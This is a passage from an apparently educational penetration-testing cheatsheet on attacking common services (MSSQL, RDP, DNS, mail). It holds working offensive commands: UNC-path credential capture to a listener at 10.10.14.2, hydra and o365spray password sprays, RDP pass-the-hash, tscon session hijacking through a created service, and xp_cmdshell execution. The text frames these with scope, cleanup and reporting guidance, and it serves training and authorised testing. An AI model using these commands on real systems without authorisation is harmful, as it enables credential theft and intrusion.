    680 ```bash
    681 sudo impacket-smbserver share "$PWD" -smb2support
    682 ```
    683 
    684 ```sql
    685 EXEC master..xp_dirtree '\\10.10.14.2\share\';
    686 GO
    687 EXEC master..xp_subdirs '\\10.10.14.2\share\';
    688 GO
    689 ```
    690 
    691 These stored procedures try to list a UNC path. Windows may authenticate to the listener as the SQL Server service account. An access-denied message from the procedure does not prove that authentication failed; inspect the listener output. Apply the same capture-versus-relay distinctions used in the SMB section.
    692 
    693 ### SQL decision record
    694 
    695 | Capability | MSSQL test | MySQL test | Impact boundary |
    696 |---|---|---|---|
    697 | List business data | `INFORMATION_SCHEMA.TABLES` | `SHOW TABLES` | database permissions |
    698 | Check admin role | `IS_SRVROLEMEMBER` | `SHOW GRANTS` | database server |
    699 | Change identity | `EXECUTE AS LOGIN` | role/account grants | effective DB principal |
    700 | Execute OS command | `xp_cmdshell` | UDF/plugin route if enabled | service account |
    701 | Read a file | `OPENROWSET(BULK...)` | `LOAD_FILE()` | service account + DB policy |
    702 | Write a file | command/OLE route | `INTO OUTFILE` | path policy + filesystem ACL |
    703 | Reach another server | linked servers | federated/app configuration | mapped remote identity |
    704 
    705 ## 9 · Remote Desktop operations `fas:Terminal`
    706 
    707 RDP provides an interactive Windows desktop over TCP/3389. Network Level Authentication moves credential validation before full session creation. TLS and NLA improve transport and pre-authentication behavior; weak passwords and excessive group membership remain exploitable.
    708 
    709 ### Enumerate the endpoint
    710 
    711 ```bash
    712 sudo nmap -Pn -n -p3389 \
    713   --script rdp-enum-encryption,rdp-ntlm-info \
    714   -oA "$EVIDENCE/rdp" "$IP"
    715 ```
    716 
    717 Save the certificate name, NTLM target identity, supported security layers, and NLA state. An open port does not prove that a specific account may log on through Remote Desktop Services.
    718 
    719 ### Controlled password spray
    720 
    721 ```bash
    722 crowbar -b rdp -s "$IP/32" -U users.txt -c 'ApprovedCandidate!'
    723 hydra -L users.txt -p 'ApprovedCandidate!' -t 2 -W 2 "$IP" rdp
    724 ```
    725 
    726 Hydra's RDP module can be unreliable under NLA and server throttling. Validate one known-good or deliberately invalid connection with a real client before treating automated failures as authoritative.
    727 
    728 ### Connect with FreeRDP
    729 
    730 ```bash
    731 xfreerdp /v:"$IP" /u:"$U" /d:"$DOMAIN" /p:"$P" /cert:tofu
    732 
    733 # Map a local staging directory as a remote drive named assessment
    734 xfreerdp /v:"$IP" /u:"$U" /d:"$DOMAIN" /p:"$P" \
    735   /drive:assessment,"$PWD/staging" /cert:tofu
    736 ```
    737 
    738 Drive, clipboard, printer, audio, and device redirection can move data in both directions. Enable only what the engagement needs. Treat the mapped drive as a transfer channel in the evidence log.
    739 
    740 ### Restricted Admin Mode and pass-the-hash
    741 
    742 Restricted Admin Mode prevents the client from sending reusable credentials to the RDP host and allows FreeRDP to authenticate with an NT hash when the target permits the mode.
    743 
    744 ```batch
    745 :: Enabling this remotely changes the target and requires prior admin rights
    746 reg add HKLM\System\CurrentControlSet\Control\Lsa ^
    747   /v DisableRestrictedAdmin /t REG_DWORD /d 0 /f
    748 ```
    749 
    750 ```bash
    751 xfreerdp /v:"$IP" /u:Administrator /pth:'<NT_HASH>' /cert:tofu
    752 ```
    753 
    754 Check the registry value before changing it and restore that exact state after the test. A successful SMB pass-the-hash does not guarantee RDP logon rights or Restricted Admin support.
    755 
    756 ### Session inventory and hijacking
    757 
    758 An administrator can list sessions, but `tscon` session reassignment without the user's password requires SYSTEM on affected older Windows versions. Modern releases have mitigations and behavior varies by version.
    759 
    760 ```batch
    761 query user
    762 query session
    763 
    764 :: Historical technique: service runs as LocalSystem and connects to session 2
    765 sc.exe create SessionProof binPath= "cmd.exe /c tscon 2 /dest:console"
    766 sc.exe start SessionProof
    767 sc.exe delete SessionProof
    768 ```
    769 
    770 This disrupts a user's desktop and creates a service. Use it only when the engagement specifically permits session access and the user-impact risk is accepted. Prefer a session listing as proof of exposure.
    771 
    772 ### BlueKeep, CVE-2019-0708
    773 
    774 BlueKeep is a pre-authentication use-after-free in older Remote Desktop Services implementations. Exploitation can crash the host. Confirm the Windows version and patch state first, use a non-exploit scanner when possible, and schedule any exploit attempt with the same controls as a reboot-risk test.
    775 
    776 ## 10 · DNS reconnaissance and trust abuse `fas:Terminal`
    777 
    778 DNS reveals the namespace that other service attacks depend on. UDP handles most queries; TCP is used for large responses and zone transfers. Start with record collection and nameserver discovery before brute-force enumeration.
    779 
    780 ### Query the namespace
    781 
    782 ```bash
    783 dig A "$TARGET" @"$IP"
    784 dig AAAA "$TARGET" @"$IP"
    785 dig NS "$DOMAIN" @"$IP"
    786 dig MX "$DOMAIN" @"$IP"
    787 dig TXT "$DOMAIN" @"$IP"
    788 dig SOA "$DOMAIN" @"$IP"
    789 dig -x "$IP" @"$IP"
    790 
    791 host -a "$DOMAIN" "$IP"
    792 ```
    793 
    794 The SOA record names the primary server and zone administrator mailbox. NS and MX records produce hosts for follow-up service scans. TXT records may expose mail policy, verification tokens, or internal naming conventions.
    795 
    796 ### Zone transfer
    797 
    798 ```bash
    799 dig AXFR "$DOMAIN" @"$IP"
    800 
    801 # Try every authoritative nameserver, because policy can differ
    802 for ns in $(dig +short NS "$DOMAIN"); do
    803   dig AXFR "$DOMAIN" @"$ns"
    804 done
    805 ```
    806 
    807 A successful AXFR can disclose the zone's hostnames and records. It is a confidentiality issue, not code execution. Save the full transfer and feed new names back into DNS resolution and port discovery.
    808 
    809 ### Subdomain enumeration
    810 
    811 ```bash
    812 subfinder -d "$DOMAIN" -silent -o subdomains-passive.txt
    813 fierce --domain "$DOMAIN" --dns-servers "$IP"
    814 
    815 while read -r name; do
    816   host "$name.$DOMAIN" "$IP"
    817 done < approved-subdomain-list.txt
    818 ```
    819 
    820 Passive discovery touches third-party sources and may reveal out-of-scope assets. Resolve and test only names within the authorised boundary.
    821 
    822 ### Dangling records and subdomain takeover
    823 
    824 ```bash
    825 dig CNAME "support.$DOMAIN" +short
    826 host "support.$DOMAIN"
    827 ```
    828 
    829 A dangling CNAME points to a provider resource that no longer exists. Provider error text is an indicator, not final proof that the name is claimable. Confirm the provider-specific conditions and get approval before registering any resource. Taking control of a production subdomain is a state-changing action with brand and cookie-scope impact.
    830 
    831 ### Local DNS spoofing
    832 
    833 Ettercap or Bettercap can answer DNS requests during an authorised layer-2 man-in-the-middle test. The path requires local network position, ARP spoofing or equivalent traffic control, and a victim that trusts the supplied response.
    834 
    835 ```text
    836 # /etc/ettercap/etter.dns example
    837 portal.example.test     A     10.10.14.2
    838 *.example.test          A     10.10.14.2
    839 ```
    840 
    841 Document the traffic-positioning prerequisite. A writable local hosts file or control of a resolver is a different finding from spoofing broadcast-domain traffic.
    842 
    843 ## 11 · SMTP, POP3, and IMAP `fas:Terminal`
    844 
    845 SMTP sends or relays mail. POP3 downloads a mailbox with a small command set. IMAP keeps mail on the server and supports folder and message search. The services often share an identity provider, so a username or password confirmed by one should be checked against the others within the approved attempt budget.
    846 
    847 ### Identify the mail platform
    848 
    849 ```bash
    850 dig +short MX "$DOMAIN"
    851 host -t MX "$DOMAIN"
    852 
    853 sudo nmap -Pn -n -sV -sC \
    854   -p25,110,143,465,587,993,995 \
    855   --script smtp-commands,smtp-enum-users,smtp-open-relay,pop3-capabilities,imap-capabilities \
    856   -oA "$EVIDENCE/mail" "$IP"
    857 ```
    858 
    859 MX hosts under `mail.protection.outlook.com` indicate Microsoft 365. Google Workspace commonly points to Google's MX hosts. Cloud identity testing has provider-specific throttling, federation, MFA, and legal constraints. Do not send generic high-rate Hydra traffic at a cloud provider.
    860 
    861 ### Manual SMTP capability and user checks
    862 
    863 ```bash
    864 openssl s_client -starttls smtp -connect "$IP:25" -crlf -quiet
    865 ```
    866 
    867 ```text
    868 EHLO assessor.example
    869 VRFY candidate
    870 EXPN staff
    871 MAIL FROM:<probe@assessor.example>
    872 RCPT TO:<candidate@example.test>
    873 RSET
    874 QUIT
    875 ```
    876 
    877 Interpret response codes in context:
    878 
    879 | Response | Typical meaning | Caveat |
    880 |---:|---|---|
    881 | `220` | service ready | banner may disclose product/hostname |
    882 | `250` | requested action accepted | acceptance can be deferred; it does not always prove mailbox delivery |
    883 | `252` | user cannot be verified, but mail may be accepted | often prevents clean VRFY enumeration |
    884 | `550` | mailbox/action rejected | policy and anti-enumeration controls can mask validity |
    885 
    886 Test valid-looking and definitely invalid controls. Username enumeration exists only when responses differ reliably enough to classify candidates.
    887 
    888 ```bash
    889 smtp-user-enum -M VRFY -U users.txt -t "$IP"
    890 smtp-user-enum -M RCPT -U users.txt -D "$DOMAIN" -t "$IP"
    891 smtp-user-enum -M EXPN -U aliases.txt -t "$IP"
    892 ```
    893 
    894 ### POP3 and IMAP by hand
    895 
    896 ```bash
    897 openssl s_client -connect "$IP:995" -crlf -quiet
    898 ```
    899 
    900 ```text
    901 USER candidate
    902 PASS <secret>
    903 STAT
    904 LIST
    905 RETR 1
    906 QUIT
    907 ```
    908 
    909 ```bash
    910 openssl s_client -connect "$IP:993" -crlf -quiet
    911 ```
    912 
    913 ```text
    914 a1 CAPABILITY
    915 a2 LOGIN candidate <secret>
    916 a3 LIST "" "*"
    917 a4 SELECT INBOX
    918 a5 SEARCH TEXT "password"
    919 a6 FETCH 1 BODY.PEEK[]
    920 a7 LOGOUT
    921 ```
    922 
    923 Use `BODY.PEEK[]` during IMAP review so the server does not set the Seen flag merely because the assessor fetched the message. Mailbox access exposes personal and regulated data; search narrowly and retain only what supports the finding.
    924 
    925 ### Self-hosted credential tests
    926 
    927 ```bash
    928 hydra -L users.txt -p 'ApprovedCandidate!' -f "$IP" pop3
    929 hydra -L users.txt -p 'ApprovedCandidate!' -f "$IP" imap
    930 hydra -L users.txt -p 'ApprovedCandidate!' -f "$IP" smtp
    931 ```
    932 
    933 Use the TLS-specific module or service syntax when the endpoint requires implicit TLS. Confirm the authentication mechanism from capabilities before interpreting failures.
    934 
    935 ### Microsoft 365 workflow
    936 
    937 The source module uses o365spray because provider-side responses, federation, and throttling need cloud-aware handling.
    938 
    939 ```bash
    940 python3 o365spray.py --validate --domain "$DOMAIN"
    941 python3 o365spray.py --enum -U users.txt --domain "$DOMAIN"
    942 python3 o365spray.py --spray -U confirmed-users.txt \
    943   -p 'ApprovedCandidate!' --count 1 --lockout 1 --domain "$DOMAIN"
    944 ```
    945 
    946 Cloud spraying can trigger tenant alerts and account controls. The engagement must explicitly name the tenant, test accounts or user population, attempt count, delay, and stop conditions. MFA does not make password validation harmless; a correct first factor remains sensitive evidence.
    947 
    948 ### Open relay validation
    949 
    950 ```bash
    951 sudo nmap -Pn -n -p25 --script smtp-open-relay "$IP"
    952 
    953 swaks --server "$IP" \
    954   --from probe@external.example \
    955   --to controlled-recipient@external.example \
    956   --header 'Subject: authorised relay proof' \
    957   --body 'Controlled relay validation. Do not forward.'
    958 ```
    959 
    960 Use sender and recipient accounts controlled by the assessment team. A `250` response during the transaction does not prove final external delivery. Retain the received message headers as evidence and avoid testing impersonation of a real employee.
    961 
    962 ### OpenSMTPD command injection, CVE-2020-7247
    963 
    964 Affected OpenSMTPD versions mishandled shell metacharacters in an attacker-controlled sender field. The daemon's local delivery path could execute a short command with elevated rights. Confirm the exact product and version before using a public proof of concept. The published technique is length constrained and is suitable only for a disposable lab or a separately approved exploit window.
    965 
    966 ## 12 · Combine services without losing state `fas:Route`
    967 
    968 The fastest path through a multi-service host is a state machine. Each new identity or secret returns to the authentication stage for every compatible service.
    969 
    970 <figure class="flow plate corners">
    971   <figcaption class="flow__cap"><span class="flow__kind">Multi-service state machine</span><span class="flow__dir">TD</span></figcaption>
    972   <div class="flow__body">
    973     <svg class="flow-svg" viewBox="0 0 460 1100" role="img" aria-label="Full scan, unauthenticated checks, collect files, update credential matrix, validate services, enumerate permissions, then a decision: if a new host account secret or trust is found loop back to the credential matrix, otherwise proceed to version-gated exploit review then minimal proof, cleanup and report">
    974       <path class="fedge" d="M200,88 L200,156" marker-end="url(#flow-arrow)" />
    975       <path class="fedge" d="M200,206 L200,274" marker-end="url(#flow-arrow)" />
    976       <path class="fedge" d="M200,324 L200,392" marker-end="url(#flow-arrow)" />
    977       <path class="fedge" d="M200,442 L200,510" marker-end="url(#flow-arrow)" />
    978       <path class="fedge" d="M200,560 L200,628" marker-end="url(#flow-arrow)" />
    979       <path class="fedge" d="M200,678 L200,746" marker-end="url(#flow-arrow)" />
    980       <path class="fedge" d="M200,832 L200,900" marker-end="url(#flow-arrow)" />
    981       <path class="fedge" d="M200,950 L200,1018" marker-end="url(#flow-arrow)" />
    982       <path class="fedge is-back" d="M380,790 L410,790 L410,418 L372,418" marker-end="url(#flow-arrow)" />
    983       <g class="fnode is-entry"><rect class="fnode__box" x="30" y="40" width="340" height="48" /><text class="fnode__label" x="200" y="68" text-anchor="middle">Full TCP plus targeted UDP scan</text></g>
    984       <g class="fnode"><rect class="fnode__box" x="30" y="158" width="340" height="48" /><text class="fnode__label" x="200" y="178" text-anchor="middle">Unauthenticated checks<tspan class="sub" x="200" dy="15">anonymous, null, records, capabilities</tspan></text></g>
    985       <g class="fnode"><rect class="fnode__box" x="30" y="276" width="340" height="48" /><text class="fnode__label" x="200" y="304" text-anchor="middle">Collect names and scoped files</text></g>
    986       <g class="fnode"><rect class="fnode__box" x="30" y="394" width="340" height="48" /><text class="fnode__label" x="200" y="422" text-anchor="middle">Update identity and credential matrix</text></g>
    987       <g class="fnode"><rect class="fnode__box" x="30" y="512" width="340" height="48" /><text class="fnode__label" x="200" y="540" text-anchor="middle">Validate against every compatible service</text></g>
    988       <g class="fnode"><rect class="fnode__box" x="30" y="630" width="340" height="48" /><text class="fnode__label" x="200" y="658" text-anchor="middle">Enumerate effective permissions</text></g>
    989       <g class="fnode is-decision"><polygon class="fdecision__poly" points="200,748 380,790 200,832 20,790" /><text class="fdecision__label" x="200" y="794" text-anchor="middle">New host, account, secret, or trust?</text></g>
    990       <g class="fnode"><rect class="fnode__box" x="30" y="902" width="340" height="48" /><text class="fnode__label" x="200" y="930" text-anchor="middle">Version-gated exploit review</text></g>
    991       <g class="fnode"><rect class="fnode__box" x="30" y="1020" width="340" height="48" /><text class="fnode__label" x="200" y="1048" text-anchor="middle">Minimal proof, cleanup, report</text></g>
    992       <g class="felabel"><rect class="felabel__box" x="394" y="596" width="32" height="16" /><text class="felabel__text" x="410" y="607" text-anchor="middle">yes</text></g>
    993       <g class="felabel"><rect class="felabel__box" x="187" y="858" width="26" height="16" /><text class="felabel__text" x="200" y="869" text-anchor="middle">no</text></g>
    994     </svg>
    995   </div>
    996 </figure>
    997 
    998 ### Chain A: file service to mail to database
    999 
   1000 1. FTP allows anonymous listing.
   1001 2. A filename or document author supplies a candidate username.
   1002 3. SMTP or POP3 responses confirm the account.
   1003 4. A controlled spray confirms a reused password.
   1004 5. A mailbox search returns a database connection string.
   1005 6. MSSQL permissions reveal `IMPERSONATE` or direct `sysadmin` access.
   1006 7. `xp_cmdshell 'whoami'` proves the OS security context.
   1007 
   1008 ### Chain B: SMB to administrative execution
   1009 
   1010 1. SMB null access exposes a share and password-policy clues through RPC.
   1011 2. Share content supplies a local administrator credential or NT hash.
   1012 3. NetExec distinguishes local from domain authentication and confirms admin rights.
   1013 4. An Impacket execution method runs a short identity command.
   1014 5. A local SAM dump is performed only if credential compromise is in scope.
   1015 6. Reuse testing is restricted to approved hosts and recorded per target.
   1016 
   1017 ### Chain C: DNS to forgotten management hosts
   1018 
   1019 1. NS and AXFR checks expose internal or legacy hostnames.
   1020 2. New names are resolved and scanned within scope.
   1021 3. An old FTP, mail, or database instance exposes a weaker authentication path.
   1022 4. The resulting account is tested on the primary services.
   1023 
   1024 ### Three-tier practice plan
   1025 
   1026 | Scenario shape | First priority | Expected connection |
   1027 |---|---|---|
   1028 | Mail, customer data, and files | SMTP/POP3/IMAP plus FTP/SMB anonymous checks | mailbox or file loot supplies the next credential |
   1029 | Rarely used backup/test host | full `-p-` scan and default/test credentials | neglected configuration exposes data or a reused secret |
   1030 | File server plus unknown database | share inventory followed by SQL fingerprinting | configuration or document content supplies database access |
   1031 
   1032 Do not import flags or dynamic lab credentials into the cheatsheet. The learning objective is the chain and its evidence, not a static answer from one spawned target.
   1033 
   1034 ## 13 · Failure analysis
   1035 
   1036 | Symptom | Likely cause | Check |
   1037 |---|---|---|
   1038 | SMB login works in one tool and fails in another | realm mismatch or guest fallback | specify domain/local realm; inspect effective username |
   1039 | `Pwn3d!` absent after valid SMB auth | account is not admin on that host | enumerate share/RPC rights instead of forcing RCE |
   1040 | Relay listener receives auth but target action fails | signing, EPA/channel binding, protocol mismatch, or weak target rights | inspect target prerequisites and ntlmrelayx logs |
   1041 | MSSQL login fails with a known domain credential | wrong auth mode, hostname, TLS, or SPN | use `-windows-auth`; resolve FQDN; test Kerberos separately |
   1042 | `xp_cmdshell` returns access denied | SQL service account lacks OS rights or proxy context differs | query service identity and use a harmless local command |
   1043 | MySQL `LOAD_FILE()` returns `NULL` | missing `FILE`, blocked path, unreadable file, or `secure_file_priv` | check grants, policy value, and filesystem assumptions |
   1044 | RDP spray tool reports all failures | NLA, throttling, TLS/client incompatibility, or lockout | test one manual connection and inspect NLA/encryption |
   1045 | SMTP gives the same reply for every user | anti-enumeration policy | compare valid and invalid controls; do not claim enumeration |
   1046 | AXFR fails against one server | transfer policy differs per NS | test each authoritative nameserver |
   1047 | FTP transfer corrupts an archive | ASCII transfer mode | repeat in `binary` mode and compare hashes |
   1048 
   1049 ## 14 · Proof, cleanup, and reporting
   1050 
   1051 ### Minimal proof ladder
   1052 
   1053 Move down this list only as far as the finding requires:
   1054 
   1055 1. Capture banner, protocol identity, and relevant configuration response.
   1056 2. List an exposed object without downloading its content.
   1057 3. Read a low-sensitivity test object or one narrowly selected file.
   1058 4. Create and delete a harmless marker in an approved path.
   1059 5. Execute `whoami` and `hostname` in an approved window.
   1060 6. Extract credential material or open a user session only when the rules of engagement require that proof.
   1061 
   1062 ### Change log
   1063 
   1064 | Time | Host | Service | Change | Original state | Cleanup | Evidence |
   1065 |---|---|---|---|---|---|---|
   1066 | UTC timestamp | target | MSSQL | enabled `xp_cmdshell` | disabled | restored to disabled | transcript path |
   1067 
   1068 Track uploaded files, services, tasks, registry values, database settings, mapped drives, relay listeners, and cloud test messages. Cleanup should be testable. Confirm a marker is gone, a setting matches its original value, and a temporary service no longer exists.
   1069 
   1070 ### Finding structure
   1071 
   1072 Write each finding around the complete path:
   1073 
   1074 - **Exposure:** the reachable service, product/version, and unauthenticated information.
   1075 - **Prerequisites:** network position, authentication state, role, signing, NLA, or provider condition.
   1076 - **Action:** the exact safe test performed.
   1077 - **Result:** data read, write permission, effective account, relayed action, or remote host reached.
   1078 - **Impact:** the data, system, or trust boundary affected. Avoid inflating a local host result into domain compromise.
   1079 - **Remediation:** disable unused protocols, remove anonymous access, enforce least privilege, patch the exact vulnerable product, require SMB signing where compatible, tighten relay protections, and monitor credential reuse.
   1080 - **Retest:** repeat the original proof and confirm it now fails for the intended reason.
   1081 
   1082 ## 15 · Compact command index `fas:ClipboardList`
   1083 
   1084 | Goal | Command |
   1085 |---|---|
   1086 | Full TCP sweep | `sudo nmap -Pn -n -p- --open -sV -oA evidence/all $IP` |
   1087 | Anonymous FTP | `ftp $IP` then `anonymous` |
   1088 | SMB shares, null | `smbclient -N -L //$IP` |
   1089 | SMB permissions | `smbmap -H $IP` |
   1090 | SMB/RPC sweep | `enum4linux-ng -A -C $IP` |
   1091 | SMB signing | `nmap -p445 --script smb2-security-mode $IP` |
   1092 | Domain password spray | `nxc smb targets.txt -d $DOMAIN -u users.txt -p 'Candidate!'` |
   1093 | MSSQL login | `impacket-mssqlclient "$DOMAIN/$U@$TARGET" -windows-auth` |
   1094 | MySQL login | `mysql -h $IP -u $U -p` |
   1095 | MSSQL OS context | `EXEC master..xp_cmdshell 'whoami';` |
   1096 | MSSQL links | `EXEC master.dbo.sp_linkedservers;` |
   1097 | RDP identity | `nmap -p3389 --script rdp-ntlm-info $IP` |
   1098 | RDP client | `xfreerdp /v:$IP /u:$U /d:$DOMAIN /p:$P /cert:tofu` |
   1099 | Zone transfer | `dig AXFR $DOMAIN @$IP` |
   1100 | Mail ports | `nmap -sV -sC -p25,110,143,465,587,993,995 $IP` |
   1101 | SMTP users | `smtp-user-enum -M RCPT -U users.txt -D $DOMAIN -t $IP` |
   1102 | Open relay | `nmap -p25 --script smtp-open-relay $IP` |
   1103 | NetNTLMv2 crack | `hashcat -m 5600 capture.txt wordlist.txt` |
   1104 
   1105 ## 16 · CVE and condition index
   1106 
   1107 | Issue | Service | Required condition | Safe validation stance |
   1108 |---|---|---|---|
   1109 | CVE-2022-22836 | CoreFTP HTTP upload | affected build plus authenticated PUT access | removable text-file write |
   1110 | CVE-2020-0796, SMBGhost | SMBv3.1.1 | affected Windows build and missing patch | scanner and patch evidence first; crash risk |
   1111 | CVE-2012-2122 | old MySQL/MariaDB builds | affected compiler/build and unpatched version | version-gated lab testing |
   1112 | CVE-2019-0708, BlueKeep | RDP | vulnerable legacy Windows/RDS and missing patch | non-exploit check first; crash risk |
   1113 | CVE-2020-7247 | OpenSMTPD | affected version and delivery path | exact fingerprint; lab or approved exploit window |
   1114 | CVE-2021-44228, Log4Shell | Java logging path | vulnerable Log4j reachable through attacker input | controlled callback and application-context evidence |
   1115 
   1116 ## 17 · References `fas:BookOpen`
   1117 
   1118 1. [HTB Academy, Attacking Common Services](https://academy.hackthebox.com/module/details/116)
   1119 2. [Microsoft Open Specifications, MS-SMB2](https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-smb2/)
   1120 3. [Microsoft, xp_cmdshell](https://learn.microsoft.com/en-us/sql/relational-databases/system-stored-procedures/xp-cmdshell-transact-sql)
   1121 4. [Microsoft, linked servers](https://learn.microsoft.com/en-us/sql/relational-databases/linked-servers/linked-servers-database-engine)
   1122 5. [Impacket](https://github.com/fortra/impacket)
   1123 6. [NetExec](https://github.com/Pennyw0rth/NetExec)
   1124 7. [enum4linux-ng](https://github.com/cddmp/enum4linux-ng)
   1125 8. [Responder](https://github.com/lgandx/Responder)
   1126 9. [FreeRDP](https://github.com/FreeRDP/FreeRDP)
   1127 10. [Nmap NSE documentation](https://nmap.org/nsedoc/)
   1128 11. [NVD, CVE-2022-22836](https://nvd.nist.gov/vuln/detail/CVE-2022-22836)
   1129 12. [NVD, CVE-2020-0796](https://nvd.nist.gov/vuln/detail/CVE-2020-0796)
   1130 13. [NVD, CVE-2012-2122](https://nvd.nist.gov/vuln/detail/CVE-2012-2122)
   1131 14. [NVD, CVE-2019-0708](https://nvd.nist.gov/vuln/detail/CVE-2019-0708)
   1132 15. [NVD, CVE-2020-7247](https://nvd.nist.gov/vuln/detail/CVE-2020-7247)
   1133 16. [NVD, CVE-2021-44228](https://nvd.nist.gov/vuln/detail/CVE-2021-44228)
   1134 
   1135 [Condensed service card](/sheets/pentest-workflow/attacking-common-services-guide) · [Workflow dashboard](/sheets/pentest-workflow/attack-flow-dashboard) · [Next long-form guide: common applications](/sheets/pentest-workflow/attacking-common-applications-guide)